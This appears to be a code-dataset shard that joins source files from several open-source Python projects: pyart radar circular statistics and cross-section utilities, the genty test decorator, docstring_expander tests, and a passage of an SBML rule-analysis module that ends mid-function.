def test_fetch_radar_time_profile():
test_radar = pyart.testing.make_empty_ppi_radar(100, 360, 5)
test_radar.time['units'] = 'seconds since 2011-05-10T00:00:01Z'
test_radar.time['data'][0] = 41220. # 2nd time in interpolated sonde
sonde_dset = netCDF4.Dataset(pyart.testing.INTERP_SOUNDE_FILE)
dic = pyart.retrieve.fetch_radar_time_profile(sonde_dset, test_radar)
assert 'wdir' in dic
assert 'wspd' in dic
assert 'height' in dic
assert round(dic['wdir'][0]) == 185
```
#### File: pyart/util/circular_stats.py
```python
import numpy as np
# For details on these computation see:
# https://en.wikipedia.org/wiki/Directional_statistics
# https://en.wikipedia.org/wiki/Mean_of_circular_quantities
def angular_mean(angles):
"""
Compute the mean of a distribution of angles in radians.
Parameters
----------
angles : array like
Distribution of angles in radians.
Returns
-------
mean : float
The mean angle of the distribution in radians.
"""
angles = np.asanyarray(angles)
x = np.cos(angles)
y = np.sin(angles)
return np.arctan2(y.mean(), x.mean())
def angular_std(angles):
"""
Compute the standard deviation of a distribution of angles in radians.
Parameters
----------
angles : array like
Distribution of angles in radians.
Returns
-------
std : float
Standard deviation of the distribution.
"""
angles = np.asanyarray(angles)
x = np.cos(angles)
y = np.sin(angles)
norm = np.sqrt(x.mean()**2 + y.mean()**2)
return np.sqrt(-2 * np.log(norm))
def angular_mean_deg(angles):
"""
Compute the mean of a distribution of angles in degrees.
Parameters
----------
angles : array like
Distribution of angles in degrees.
Returns
-------
mean : float
The mean angle of the distribution in degrees.
"""
return np.rad2deg(angular_mean(np.deg2rad(angles)))
def angular_std_deg(angles):
"""
Compute the standard deviation of a distribution of angles in degrees.
Parameters
----------
angles : array like
Distribution of angles in degrees.
Returns
-------
std : float
Standard deviation of the distribution.
"""
return np.rad2deg(angular_std(np.deg2rad(angles)))
def interval_mean(dist, interval_min, interval_max):
"""
Compute the mean of a distribution within an interval.
Return the average of the array elements which are interpreted as being
taken from a circular interval with endpoints given by interval_min and
interval_max.
Parameters
----------
dist : array like
Distribution of values within an interval.
interval_min, interval_max : float
The endpoints of the interval.
Returns
-------
mean : float
        The mean value of the distribution.
"""
# transform distribution from original interval to [-pi, pi]
half_width = (interval_max - interval_min) / 2.
center = interval_min + half_width
a = (np.asarray(dist) - center) / (half_width) * np.pi
# compute the angular mean and convert back to original interval
a_mean = angular_mean(a)
return (a_mean * (half_width) / np.pi) + center
def interval_std(dist, interval_min, interval_max):
"""
Compute the standard deviation of a distribution within an interval.
Return the standard deviation of the array elements which are interpreted
as being taken from a circular interval with endpoints given by
interval_min and interval_max.
Parameters
----------
dist : array_like
Distribution of values within an interval.
interval_min, interval_max : float
The endpoints of the interval.
Returns
-------
std : float
The standard deviation of the distribution.
"""
# transform distribution from original interval to [-pi, pi]
half_width = (interval_max - interval_min) / 2.
center = interval_min + half_width
a = (np.asarray(dist) - center) / (half_width) * np.pi
# compute the angular standard dev. and convert back to original interval
a_std = angular_std(a)
return (a_std * (half_width) / np.pi)
```
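A brief worked example (added sketch; assumes these functions are importable from `pyart.util`): averaging 350 and 10 degrees naively gives 180, while the circular mean wraps to roughly 0, and `interval_mean` applies the same idea to an arbitrary circular interval.

```python
from pyart.util import angular_mean_deg, interval_mean

print(angular_mean_deg([350., 10.]))         # ~0.0, not 180
print(interval_mean([350., 20.], 0., 360.))  # ~5.0, wrapping around 360 -> 0
```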
#### File: pyart/util/xsect.py
```python
from copy import copy
import numpy as np
from ..core import Radar
def cross_section_ppi(radar, target_azimuths):
"""
Extract cross sections from a PPI volume along one or more azimuth angles.
Parameters
----------
radar : Radar
Radar volume containing PPI sweeps from which azimuthal
cross sections will be extracted.
    target_azimuths : list
Azimuthal angles in degrees where cross sections will be taken.
Returns
-------
radar_rhi : Radar
Radar volume containing RHI sweeps which contain azimuthal
cross sections from the original PPI volume.
"""
    # determine which rays from the ppi radar make up the pseudo RHI
prhi_rays = []
rhi_nsweeps = len(target_azimuths)
ppi_nsweeps = radar.nsweeps
for target_azimuth in target_azimuths:
for sweep_slice in radar.iter_slice():
sweep_azimuths = radar.azimuth['data'][sweep_slice]
ray_number = np.argmin(np.abs(sweep_azimuths - target_azimuth))
prhi_rays.append(ray_number + sweep_slice.start)
_range = _copy_dic(radar.range)
latitude = _copy_dic(radar.latitude)
longitude = _copy_dic(radar.longitude)
altitude = _copy_dic(radar.altitude)
metadata = _copy_dic(radar.metadata)
scan_type = 'rhi'
time = _copy_dic(radar.time, excluded_keys=['data'])
time['data'] = radar.time['data'][prhi_rays].copy()
azimuth = _copy_dic(radar.azimuth, excluded_keys=['data'])
azimuth['data'] = radar.azimuth['data'][prhi_rays].copy()
elevation = _copy_dic(radar.elevation, excluded_keys=['data'])
elevation['data'] = radar.elevation['data'][prhi_rays].copy()
fields = {}
for field_name, orig_field_dic in radar.fields.items():
field_dic = _copy_dic(orig_field_dic, excluded_keys=['data'])
field_dic['data'] = orig_field_dic['data'][prhi_rays].copy()
fields[field_name] = field_dic
sweep_number = _copy_dic(radar.sweep_number, excluded_keys=['data'])
sweep_number['data'] = np.arange(rhi_nsweeps, dtype='int32')
sweep_mode = _copy_dic(radar.sweep_mode, excluded_keys=['data'])
sweep_mode['data'] = np.array(['rhi']*rhi_nsweeps)
fixed_angle = _copy_dic(radar.fixed_angle, excluded_keys=['data'])
fixed_angle['data'] = np.array(target_azimuths, dtype='float32')
sweep_start_ray_index = _copy_dic(
radar.sweep_start_ray_index, excluded_keys=['data'])
ssri = np.arange(rhi_nsweeps, dtype='int32') * ppi_nsweeps
sweep_start_ray_index['data'] = ssri
sweep_end_ray_index = _copy_dic(
radar.sweep_end_ray_index, excluded_keys=['data'])
seri = np.arange(rhi_nsweeps, dtype='int32')*ppi_nsweeps + ppi_nsweeps-1
sweep_end_ray_index['data'] = seri
radar_rhi = Radar(
time, _range, fields, metadata, scan_type,
latitude, longitude, altitude,
sweep_number, sweep_mode, fixed_angle,
sweep_start_ray_index, sweep_end_ray_index,
azimuth, elevation)
return radar_rhi
def _copy_dic(orig_dic, excluded_keys=None):
""" Return a copy of the original dictionary copying each element. """
if excluded_keys is None:
excluded_keys = []
dic = {}
for k, v in orig_dic.items():
if k not in excluded_keys:
dic[k] = copy(v)
return dic
```
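A usage sketch of `cross_section_ppi` (added for illustration; the file name is hypothetical): extract pseudo-RHI cross sections at two azimuths from a PPI volume.

```python
import pyart

radar = pyart.io.read('ppi_volume_file')  # hypothetical file name
xsect = pyart.util.cross_section_ppi(radar, [45., 225.])
print(xsect.scan_type)  # 'rhi'
print(xsect.nsweeps)    # 2, one pseudo-RHI sweep per requested azimuth
```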
{
"source": "josephhardinee/rca",
"score": 2
} |
#### File: rca/tests/alexis_test.py
```python
import pytest
# from rca.src.rca.module.calculate_dbz95 import calculate_dbz95_ppi
__author__ = "<NAME>"
__copyright__ = "<NAME>"
__license__ = "mit"
# Creating a sample function
def a_name(x):
print("First letter of ", x, " is:", x[0])
if x[0] == "A":
return 1
else:
return 0
def test_a_name():
assert a_name("Alexis") == 1
assert a_name("Brian") == 0
assert a_name("Apple") == 1
```
{
"source": "josephharrington/genty",
"score": 3
} |
#### File: test/genty/genty.py
```python
from __future__ import unicode_literals
import functools
import math
import types
import re
import sys
from box.test.genty.genty_args import GentyArgs
def genty(target_cls):
"""Decorator used in conjunction with @genty_dataset and @genty_repeat.
This decorator takes the information provided by @genty_dataset and
@genty_repeat and generates the corresponding test methods.
:param target_cls:
Test class whose test methods have been decorated.
:type target_cls:
`class`
"""
tests = _expand_tests(target_cls)
tests_with_datasets = _expand_datasets(tests)
tests_with_datasets_and_repeats = _expand_repeats(tests_with_datasets)
_add_new_test_methods(target_cls, tests_with_datasets_and_repeats)
return target_cls
def _expand_tests(target_cls):
"""
Generator of all the test unbound functions in the given class.
:param target_cls:
Target test class.
:type target_cls:
`class`
:return:
Generator of all the test_methods in the given class yielding
tuples of method name and unbound function.
:rtype:
`generator` of `tuple` of (`unicode`, `function`)
"""
entries = dict(target_cls.__dict__.iteritems())
for key, value in entries.iteritems():
if key.startswith('test') and isinstance(value, types.FunctionType):
if not hasattr(value, 'genty_generated_test'):
yield key, value
def _expand_datasets(test_functions):
"""
Generator producing test_methods, with an optional dataset.
:param test_functions:
Iterator over tuples of test name and test unbound function.
:type test_functions:
`iterator` of `tuple` of (`unicode`, `function`)
:return:
Generator yielding a tuple of
(method_name, unbound function, dataset name, dataset)
:rtype:
`generator` of `tuple` of
(`unicode`, `function`, `unicode` or None, `tuple` or None)
"""
for name, func in test_functions:
datasets = getattr(func, 'genty_datasets', {})
if datasets:
for dataset_name, dataset in datasets.iteritems():
yield name, func, dataset_name, dataset
else:
yield name, func, None, None
def _expand_repeats(test_functions):
"""
Generator producing test_methods, with any repeat count unrolled.
:param test_functions:
Sequence of tuples of
(test_method_name, test unbound function, dataset name, dataset)
:type test_functions:
`iterator` of `tuple` of
(`unicode`, `function`, `unicode` or None, `tuple` or None)
:return:
Generator yielding a tuple of
        (method_name, unbound function, dataset name, dataset, repeat_suffix)
:rtype:
`generator` of `tuple` of (`unicode`, `function`,
`unicode` or None, `tuple` or None, `unicode`)
"""
for name, func, dataset_name, dataset in test_functions:
repeat_count = getattr(func, 'genty_repeat_count', 0)
if repeat_count:
for i in xrange(1, repeat_count + 1):
repeat_suffix = _build_repeat_suffix(i, repeat_count)
yield name, func, dataset_name, dataset, repeat_suffix
elif dataset:
yield name, func, dataset_name, dataset, None
def _add_new_test_methods(target_cls, tests_with_datasets_and_repeats):
"""Define the given tests in the given class.
:param target_cls:
Test class where to define the given test methods.
:type target_cls:
`class`
:param tests_with_datasets_and_repeats:
Sequence of tuples describing the new test to add to the class.
        (method_name, unbound function, dataset name, dataset, repeat_suffix)
:type tests_with_datasets_and_repeats:
Sequence of `tuple` of (`unicode`, `function`,
`unicode` or None, `tuple` or None, `unicode`)
"""
for test_info in tests_with_datasets_and_repeats:
method_name, func, dataset_name, dataset, repeat_suffix = test_info
# Remove the original test_method as it's superseded by this
# generated method.
is_first_reference = _delete_original_test_method(
target_cls,
method_name,
)
        # However, if that test_method is referenced by name in sys.argv,
        # then take one of the generated methods (we take the first) and
        # give that generated method the original name... so that the reference
        # can find an actual test method.
if is_first_reference and _is_referenced_in_argv(method_name):
dataset_name = None
repeat_suffix = None
_add_method_to_class(
target_cls,
method_name,
func,
dataset_name,
dataset,
repeat_suffix,
)
def _is_referenced_in_argv(method_name):
"""
Various test runners allow one to run a specific test like so:
python -m unittest -v <test_module>.<test_name>
    Return True if the given method name is so referenced.
:param method_name:
Base name of the method to add.
:type method_name:
`unicode`
:return:
Is the given method referenced by the command line.
:rtype:
`bool`
"""
expr = '.*[:.]{}$'.format(method_name)
regex = re.compile(expr)
return any(regex.match(arg) for arg in sys.argv)
def _build_repeat_suffix(iteration, count):
"""
Return the suffix string to identify iteration X out of Y.
For example, with a count of 100, this will build strings like
"iteration_053" or "iteration_008".
:param iteration:
Current iteration.
:type iteration:
`int`
:param count:
Total number of iterations.
:type count:
`int`
:return:
Repeat suffix.
:rtype:
`unicode`
"""
format_width = int(math.ceil(math.log(count + 1, 10)))
new_suffix = 'iteration_{:0{width}d}'.format(iteration, width=format_width)
return new_suffix
def _delete_original_test_method(target_cls, name):
"""
Delete an original test method with the given name.
:param target_cls:
Target class.
:type target_cls:
`class`
:param name:
Name of the method to remove.
:type name:
`unicode`
:return:
True if the original method existed
:rtype:
`bool`
"""
attribute = getattr(target_cls, name, None)
if attribute and not getattr(attribute, 'genty_generated_test', None):
delattr(target_cls, name)
return True
else:
return False
def _build_final_method_name(method_name, dataset_name, repeat_suffix):
"""
Return a nice human friendly name, that almost looks like code.
Example: a test called 'test_something' with a dataset of (5, 'hello')
Return: "test_something(5, 'hello')"
Example: a test called 'test_other_stuff' with dataset of (9) and repeats
Return: "test_other_stuff(9) iteration_<X>"
:param method_name:
Base name of the method to add.
:type method_name:
`unicode`
:param dataset_name:
Base name of the data set.
:type dataset_name:
`unicode` or None
:param repeat_suffix:
Suffix to append to the name of the generated method.
:type repeat_suffix:
`unicode` or None
:return:
The fully composed name of the generated test method.
:rtype:
`unicode`
"""
if not dataset_name and not repeat_suffix:
return method_name
# Place data_set info inside parens, as if it were a function call
test_method_suffix = '({})'.format(dataset_name or "")
if repeat_suffix:
test_method_suffix = test_method_suffix + " " + repeat_suffix
test_method_name_for_dataset = "{}{}".format(
method_name,
test_method_suffix,
)
return test_method_name_for_dataset
def _build_method_wrapper(method, dataset):
if dataset:
# Create the test method with the given data set.
if isinstance(dataset, GentyArgs):
test_method_for_dataset = lambda my_self: method(
my_self,
*dataset.args,
**dataset.kwargs
)
else:
test_method_for_dataset = lambda my_self: method(my_self, *dataset)
else:
test_method_for_dataset = lambda my_self: method(my_self)
return test_method_for_dataset
def _add_method_to_class(
target_cls,
method_name,
func,
dataset_name,
dataset,
repeat_suffix,
):
"""
Add the described method to the given class.
:param target_cls:
Test class to which to add a method.
:type target_cls:
`class`
:param method_name:
Base name of the method to add.
:type method_name:
`unicode`
:param func:
The test function to add.
:type func:
`callable`
:param dataset_name:
Base name of the data set.
:type dataset_name:
`unicode` or None
:param dataset:
Tuple containing the args of the dataset.
:type dataset:
`tuple` or None
:param repeat_suffix:
Suffix to append to the name of the generated method.
:type repeat_suffix:
`unicode` or None
"""
test_method_name_for_dataset = _build_final_method_name(
method_name,
dataset_name,
repeat_suffix,
)
test_method_for_dataset = _build_method_wrapper(func, dataset)
test_method_for_dataset = functools.update_wrapper(
test_method_for_dataset,
func,
)
test_method_name_for_dataset = test_method_name_for_dataset.encode(
'utf-8',
'replace',
)
test_method_for_dataset.__name__ = test_method_name_for_dataset
test_method_for_dataset.genty_generated_test = True
# Add the method to the class under the proper name
setattr(target_cls, test_method_name_for_dataset, test_method_for_dataset)
```
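A usage sketch of the decorator (hedged: `genty_dataset` and `genty_repeat` live in sibling modules of this package and are assumed to be exported alongside `genty`, as in the upstream genty API):

```python
import unittest
from box.test.genty import genty, genty_dataset, genty_repeat

@genty
class SquareTest(unittest.TestCase):

    @genty_dataset((2, 4), (3, 9))
    def test_square(self, base, expected):
        # @genty generates one test method per dataset entry
        self.assertEqual(base ** 2, expected)

    @genty_repeat(3)
    def test_stable(self):
        # @genty generates three methods suffixed 'iteration_<N>'
        self.assertTrue(True)
```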
{
"source": "joseph-hellerstein/kwmgr",
"score": 2
} |
#### File: joseph-hellerstein/kwmgr/setup.py
```python
from setuptools import setup
with open("README.md", "r") as fh:
long_description = fh.read()
INSTALL_REQUIRES = [
]
def doSetup(install_requires):
setup(
name='docstring_expander',
version='0.23',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/joseph-hellerstein/docstring_expander.git',
description='Enables intellisense for **kwargs',
long_description=long_description,
long_description_content_type='text/markdown',
packages=['docstring_expander'],
package_dir={'docstring_expander':
'docstring_expander'},
install_requires=install_requires,
include_package_data=True,
)
if __name__ == '__main__':
doSetup(INSTALL_REQUIRES)
```
#### File: kwmgr/tests/test_expander.py
```python
from docstring_expander.expander import Expander
from docstring_expander.kwarg import Kwarg
import copy
import unittest
IGNORE_TEST = False
KWARGS = [
Kwarg("num_col", default=3, doc="number of columns", dtype=int),
Kwarg("num_row", default=3, doc="number of rows"),
Kwarg("num_plot", doc="number of plots", dtype=int),
Kwarg("plot_title", doc="Title of the plot", dtype=str),
Kwarg("title_font", doc="Font size for plot", dtype=float),
Kwarg("dummy"),
]
HEADER = """
Header line 1
Header line 2
"""
TRAILER = """
Trailer line 1
Trailer line 2
"""
BASE = ["num_row", "num_col", "title_font", "plot_title"]
DOCSTRING = """
This is a test function.
Parameters
----------
#@expand
"""
def func(arg, **kwargs):
"""
This is a test function.
Parameters
----------
#@expand
"""
return kwargs.values()
@Expander(KWARGS, BASE)
def funcExpanded(arg, **kwargs):
"""
This is a test function.
Parameters
----------
#@expand
"""
return kwargs.values()
class TestExpander(unittest.TestCase):
def setUp(self):
self.expander = Expander(KWARGS, BASE)
self.func = copy.deepcopy(func)
self.func.__doc__ = DOCSTRING
def testConstructor(self):
if IGNORE_TEST:
return
diff = set(self.expander.keywords).symmetric_difference(BASE)
self.assertEqual(len(diff), 0)
def testCall(self):
if IGNORE_TEST:
return
new_func = self.expander.__call__(self.func)
for key in BASE:
self.assertTrue(key in new_func.__doc__)
def testCallHeader(self):
if IGNORE_TEST:
return
expander = Expander(KWARGS, BASE, header=HEADER)
new_func = expander.__call__(self.func)
self.assertTrue("Header" in new_func.__doc__)
def testCallTrailer(self):
if IGNORE_TEST:
return
expander = Expander(KWARGS, BASE, trailer=TRAILER)
new_func = expander.__call__(self.func)
self.assertTrue("Trailer" in new_func.__doc__)
def testDecorator(self):
if IGNORE_TEST:
return
new_func = self.expander.__call__(self.func)
        self.assertEqual(new_func.__doc__, funcExpanded.__doc__)
def construct(self, excludes=[], includes=[]):
expander = Expander(KWARGS, BASE, excludes=excludes, includes=includes)
new_func = expander.__call__(self.func)
return new_func.__doc__
def testExclude(self):
if IGNORE_TEST:
return
#
string = self.construct(excludes=BASE[1:])
for key in BASE[1:]:
self.assertFalse(key in string)
def testInclude(self):
if IGNORE_TEST:
return
string = self.construct(includes=["num_plot"])
a_list = list(BASE)
a_list.append("num_plot")
for key in a_list:
self.assertTrue(key in string)
if __name__ == '__main__':
unittest.main()
```
{
"source": "joseph-hellerstein/mapping",
"score": 3
} |
#### File: mapping/examples/util.py
```python
def getKey():
with open("../apikey.txt", "r") as fd:
return fd.read()
def getMapboxToken():
with open("../mapbox_token.txt", "r") as fd:
return fd.read()
```
{
"source": "joseph-hellerstein/RuleBasedProgramming",
"score": 2
} |
#### File: SBMLparser/atomizer/analyzeSBML.py
```python
from pyparsing import Word, Suppress, Optional, alphanums, Group, ZeroOrMore
import numpy as np
import json
import itertools
import math
import re
import difflib
from copy import deepcopy, copy
from collections import defaultdict, Counter
import utils.structures as st
import detectOntology
from utils.util import logMess
from utils.util import pmemoize as memoize
'''
This module classifies rules according to the information contained in the
JSON config file, based on their reactants and products.
'''
@memoize
def get_close_matches(match, dataset, cutoff=0.6):
return difflib.get_close_matches(match, dataset, cutoff=cutoff)
@memoize
def sequenceMatcher(a,b):
'''
compares two strings ignoring underscores
'''
return difflib.SequenceMatcher(lambda x:x == '_',a,b).ratio()
name = Word(alphanums + '_-') + ':'
species = (Word(alphanums + "_" + ":#-")
+ Suppress('()') + Optional(Suppress('@' + Word(alphanums + '_-')))) + ZeroOrMore(Suppress('+') + Word(alphanums + "_" + ":#-")
+ Suppress("()") + Optional(Suppress('@' + Word(alphanums + '_-'))))
rate = Word(alphanums + "()")
grammar = Suppress(Optional(name)) + ((Group(species) | '0') + Suppress(Optional("<") + "->") + (Group(species) | '0') + Suppress(rate))
@memoize
def parseReactions(reaction, specialSymbols=''):
if reaction.startswith('#'):
return None
result = grammar.parseString(reaction).asList()
if len(result) < 2:
result = [result, []]
if '<->' in reaction and len(result[0]) == 1 and len(result[1]) == 2:
result.reverse()
return result
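# A worked example of the grammar above (illustrative sketch, not part of
# the original source):
#   parseReactions('A() + B() -> C() k1')   returns [['A', 'B'], ['C']]
#   parseReactions('A() <-> B() + C() k1')  returns [['B', 'C'], ['A']]
# (reversible reactions with one reactant and two products are reversed so
# the two-species side is listed first)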
def addToDependencyGraph(dependencyGraph, label, value):
if label not in dependencyGraph:
dependencyGraph[label] = []
if value not in dependencyGraph[label] and value != []:
dependencyGraph[label].append(value)
class SBMLAnalyzer:
def __init__(self, modelParser, configurationFile, namingConventions, speciesEquivalences=None, conservationOfMass = True):
self.modelParser = modelParser
self.configurationFile = configurationFile
self.namingConventions = detectOntology.loadOntology(namingConventions)
self.userNamingConventions = copy(self.namingConventions)
self.speciesEquivalences = speciesEquivalences
self.userEquivalencesDict = None
self.lexicalSpecies = []
self.conservationOfMass = conservationOfMass
def distanceToModification(self, particle, modifiedElement, translationKeys):
posparticlePos = [m.start() + len(particle) for m in re.finditer(particle, modifiedElement)]
preparticlePos = [m.start() for m in re.finditer(particle, modifiedElement)]
keyPos = [m.start() for m in re.finditer(translationKeys, modifiedElement)]
distance = [abs(y-x) for x in posparticlePos for y in keyPos]
distance.extend([abs(y-x) for x in preparticlePos for y in keyPos])
distance.append(9999)
return min(distance)
def fuzzyArtificialReaction(self,baseElements,modifiedElement,molecules):
'''
in case we don't know how a species is composed but we know its base
elements, try to get it by concatenating its basic reactants
'''
import collections
compare = lambda x, y: collections.Counter(x) == collections.Counter(y)
equivalenceTranslator,translationKeys,conventionDict = self.processNamingConventions2(molecules)
indirectEquivalenceTranslator= {x:[] for x in equivalenceTranslator}
self.processFuzzyReaction([baseElements,modifiedElement],translationKeys,conventionDict,indirectEquivalenceTranslator)
newBaseElements = baseElements
for modification in indirectEquivalenceTranslator:
for element in indirectEquivalenceTranslator[modification]:
newBaseElements = [element[2][1] if x==element[2][0] else x for x in newBaseElements]
if compare(baseElements,newBaseElements):
return None
return newBaseElements
def analyzeSpeciesModification2(self, baseElement, modifiedElement, partialAnalysis):
"""
A method to read modifications within complexes.
"""
def index_min(values):
return min(xrange(len(values)), key=values.__getitem__)
equivalenceTranslator, translationKeys, conventionDict = self.processNamingConventions2([baseElement, modifiedElement])
differencePosition = [(i, x) for i, x in enumerate(difflib.ndiff(baseElement, modifiedElement)) if x.startswith('+')]
tmp = ''
lastIdx = 0
newDifferencePosition = []
for i in range(len(differencePosition)):
tmp += differencePosition[i][1][-1]
if tmp in translationKeys:
newDifferencePosition.append(((differencePosition[lastIdx][0] + differencePosition[i][0]) / 2, tmp))
tmp = ''
lastIdx = i
differencePosition = newDifferencePosition
if len(differencePosition) == 0:
return None, None, None
sortedPartialAnalysis = sorted(partialAnalysis, key=len, reverse=True)
tokenPosition = []
tmpModifiedElement = modifiedElement
for token in sortedPartialAnalysis:
sequenceMatcher = difflib.SequenceMatcher(None, token, tmpModifiedElement)
#sequenceMatcher2 = difflib.SequenceMatcher(None,token,baseElement)
modifiedMatchingBlocks = [m.span() for m in re.finditer(token, tmpModifiedElement)]
baseMatchingBlocks = [m.span() for m in re.finditer(token, baseElement)]
            #matchingBlocks = [x for x in modifiedMatchingBlocks for y in baseMatchingBlocks if ]
if len(modifiedMatchingBlocks) > 0 and len(baseMatchingBlocks) > 0:
#select the matching block with the lowest distance to the base matching block
matchingBlockIdx = index_min([min([abs((y[1]+y[0])/2 - (x[1]+x[0])/2) for y in baseMatchingBlocks]) for x in modifiedMatchingBlocks])
matchingBlock = modifiedMatchingBlocks[matchingBlockIdx]
tmpModifiedElement = list(tmpModifiedElement)
for idx in range(matchingBlock[0],matchingBlock[1]):
tmpModifiedElement[idx] = '_'
tmpModifiedElement = ''.join(tmpModifiedElement)
tokenPosition.append((matchingBlock[0],matchingBlock[1]-1))
else:
#try fuzzy search
sequenceMatcher = difflib.SequenceMatcher(None,token,tmpModifiedElement)
match = ''.join(tmpModifiedElement[j:j+n] for i, j, n in sequenceMatcher.get_matching_blocks() if n)
if (len(match)) / float(len(token)) < 0.8:
tokenPosition.append([999999999])
else:
tmp = [i for i, y in enumerate(difflib.ndiff(token, tmpModifiedElement)) if not y.startswith('+')]
if tmp[-1] - tmp[0] > len(token) + 5:
tokenPosition.append([999999999])
continue
tmpModifiedElement = list(tmpModifiedElement)
for idx in tmp:
if idx< len(tmpModifiedElement):
tmpModifiedElement[idx] = '_'
tmpModifiedElement = ''.join(tmpModifiedElement)
tmp = [tmp[0],tmp[-1]-1]
tokenPosition.append(tmp)
intersection = []
for difference in differencePosition:
distance = []
for token in tokenPosition:
distance.append(min([abs(difference[0] - subtoken) for subtoken in token]))
closestToken = sortedPartialAnalysis[index_min(distance)]
#if difference[1] in conventionDict:
intersection.append([difference[1],closestToken,min(distance)])
        if intersection:
            minimumToken = min(intersection, key=lambda x: x[2])
            return minimumToken[1], translationKeys, equivalenceTranslator
return None, None, None
def analyzeSpeciesModification(self, baseElement, modifiedElement, partialAnalysis):
'''
        A method for trying to read modifications within complexes.
        This is only possible once we know their internal structure
        (this method is called after the dependency graph has been
        created and resolved).
'''
equivalenceTranslator, translationKeys, conventionDict = self.processNamingConventions2([baseElement, modifiedElement])
scores = []
if len(translationKeys) == 0:
'''
there's no clear lexical path between reactant and product
'''
return None, None, None
for particle in partialAnalysis:
distance = 9999
comparisonElement = max(baseElement, modifiedElement, key=len)
if re.search('(_|^){0}(_|$)'.format(particle), comparisonElement) == None:
distance = self.distanceToModification(particle, comparisonElement, translationKeys[0])
score = difflib.ndiff(particle, modifiedElement)
else:
# FIXME: make sure we only do a search on those variables that are viable
                # candidates. this is once again fuzzy string matching. there should
# be a better way of doing this with difflib
permutations = set(['_'.join(x) for x in itertools.permutations(partialAnalysis, 2) if x[0] == particle])
if all([x not in modifiedElement for x in permutations]):
distance = self.distanceToModification(particle, comparisonElement, translationKeys[0])
score = difflib.ndiff(particle, modifiedElement)
            # FIXME: this is just an ad-hoc parameter in terms of how far a mod is from a species name
# use something better
if distance < 4:
scores.append([particle, distance])
if len(scores) > 0:
winner = scores[[x[1] for x in scores].index(min([x[1] for x in scores]))][0]
else:
winner = None
if winner:
return winner, translationKeys, equivalenceTranslator
return None, None, None
def findMatchingModification(self, particle, species):
@memoize
def findMatchingModificationHelper(particle, species):
difference = difflib.ndiff(species,particle)
differenceList = tuple([x for x in difference if '+' in x])
if differenceList in self.namingConventions['patterns']:
return [self.namingConventions['patterns'][differenceList]]
fuzzyKey = ''.join([x[2:] for x in differenceList])
differenceList = self.testAgainstExistingConventions(fuzzyKey,self.namingConventions['modificationList'])
#can we state the modification as the combination of multiple modifications
if differenceList:
classificationList = []
for x in differenceList[0]:
differenceKey = tuple(['+ {0}'.format(letter) for letter in x])
classificationList.append(self.namingConventions['patterns'][differenceKey])
return classificationList
return None
return findMatchingModificationHelper(particle,species)
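    # Hedged illustration (added, not part of the original source): for
    # particle='A_P' and species='A', difflib.ndiff('A', 'A_P') yields
    # ['  A', '+ _', '+ P'], so differenceList becomes ('+ _', '+ P').
    # If that tuple is a key of self.namingConventions['patterns'] the
    # associated modification is returned directly; otherwise the fuzzy key
    # '_P' is tested against combinations of known modifications through
    # testAgainstExistingConventions.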
def greedyModificationMatching(self,speciesString, referenceSpecies):
'''
        Recursive function that tries to map a given species string to a permutation of the strings in referenceSpecies.
>>> sa = SBMLAnalyzer(None,'./config/reactionDefinitions.json','./config/namingConventions.json')
>>> sorted(sa.greedyModificationMatching('EGF_EGFR',['EGF','EGFR']))
['EGF', 'EGFR']
>>> sorted(sa.greedyModificationMatching('EGF_EGFR_2_P_Grb2',['EGF','EGFR','EGF_EGFR_2_P','Grb2']))
['EGF_EGFR_2_P', 'Grb2']
>>> sorted(sa.greedyModificationMatching('A_B_C_D',['A','B','C','C_D','A_B_C','A_B']))
['A_B', 'C_D']
'''
bestMatch = ['', 0]
finalMatches = []
blacklist = []
while(len(blacklist)< len(referenceSpecies)):
localReferenceSpecies = [x for x in referenceSpecies if x not in blacklist and len(x) <= len(speciesString)]
for species in localReferenceSpecies:
if species in speciesString and len(species) > bestMatch[1] and species != speciesString:
bestMatch = [species,len(species)]
if bestMatch != ['', 0]:
result = self.greedyModificationMatching(speciesString.replace(bestMatch[0],''), referenceSpecies)
finalMatches = [bestMatch[0]]
if result == -1:
finalMatches = []
blacklist.append(bestMatch[0])
bestMatch = ['',0]
continue
elif result != -2:
finalMatches.extend(result)
break
elif len([x for x in speciesString if x != '_']) > 0:
return -1
else:
return -2
return finalMatches
def findClosestModification(self, particles, species, annotationDict, originalDependencyGraph):
'''
maps a set of particles to the complete set of species using lexical analysis. This step is done
        independently of the reaction network.
'''
equivalenceTranslator = {}
dependencyGraph = {}
localSpeciesDict = defaultdict(lambda : defaultdict(list))
def analyzeByParticle(splitparticle,species,
equivalenceTranslator=equivalenceTranslator,
dependencyGraph=dependencyGraph):
basicElements = []
composingElements = []
splitpindex = -1
#for splitpindex in range(0,len(splitparticle)):
while (splitpindex + 1)< len(splitparticle):
splitpindex += 1
splitp = splitparticle[splitpindex]
if splitp in species:
closestList = [splitp]
similarList = get_close_matches(splitp,species)
similarList = [x for x in similarList if x != splitp and len(x) < len(splitp)]
similarList = [[x,splitp] for x in similarList]
if len(similarList) > 0:
for similarity in similarList:
#compare close lexical proximity
fuzzyList = self.processAdHocNamingConventions(similarity[0],
similarity[1],localSpeciesDict,False,species)
for reaction,tag,modifier in fuzzyList:
if modifier != None and all(['-' not in x for x in modifier]):
logMess('INFO:LAE001','Lexical relationship inferred between \
{0}, user information confirming it is required'.format(similarity))
else:
closestList = get_close_matches(splitp,species)
closestList = [x for x in closestList if len(x) < len(splitp)]
                    # if there's nothing in the species list we can find a lexical
                    # neighbor from, then try to create one based on the two
                    # positional neighbors
if closestList == []:
flag= True
#do i get something by merging with the previous component?
if len(composingElements) > 0:
tmp,tmp2 = analyzeByParticle([composingElements[-1] + '_' + splitp], species)
if tmp != [] and tmp2 != []:
flag = False
splitp = composingElements[-1] + '_' + splitp
composingElements.pop()
closestList = tmp
localEquivalenceTranslator,_,_ = self.processNamingConventions2([tmp[0],tmp2[0]])
for element in localEquivalenceTranslator:
if element not in equivalenceTranslator:
equivalenceTranslator[element] = []
equivalenceTranslator[element].extend(localEquivalenceTranslator[element])
for instance in localEquivalenceTranslator[element]:
addToDependencyGraph(dependencyGraph,instance[1],[instance[0]])
#do i get something by merging with the next component?
if flag and splitpindex + 1 != len(splitparticle):
tmp,tmp2 = analyzeByParticle([splitp+ '_' + splitparticle[splitpindex+1]],species)
if tmp!= [] and tmp2 != []:
splitp = splitp+ '_' + splitparticle[splitpindex+1]
splitpindex += 1
closestList = tmp
localEquivalenceTranslator,_,_ = self.processNamingConventions2([tmp[0],tmp2[0]])
for element in localEquivalenceTranslator:
if element not in equivalenceTranslator:
equivalenceTranslator[element] = []
